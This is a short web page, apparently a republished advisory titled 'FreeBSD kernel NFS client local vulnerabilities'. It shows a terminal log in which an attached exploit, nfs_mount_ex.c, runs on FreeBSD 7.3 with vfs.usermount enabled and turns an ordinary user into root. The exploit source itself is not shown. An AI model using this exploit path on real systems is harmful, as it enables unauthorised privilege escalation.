天天看点

FreeBSD kernel NFS client local vulnerabilities

* [argp@julius ~]$ uname -rsi

* freebsd 7.3-RELEASE GENERIC

* [argp@julius ~]$ sysctl vfs.usermount

* vfs.usermount: 1

* [argp@julius ~]$ id

* uid=1001(argp) gid=1001(argp) groups=1001(argp)

* [argp@julius ~]$ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex

* [argp@julius ~]$ ./nfs_mount_ex

* [*] calling nmount()

* [!] nmount error: -1030740736

* nmount: Unknown error: -1030740736

* uid=0(root) gid=0(wheel) egid=1001(argp) groups=1001(argp)

nfs_mount_ex.c (4.33 K, 下载次数:0, 上传时间:2010-06-16 13:14)

继续阅读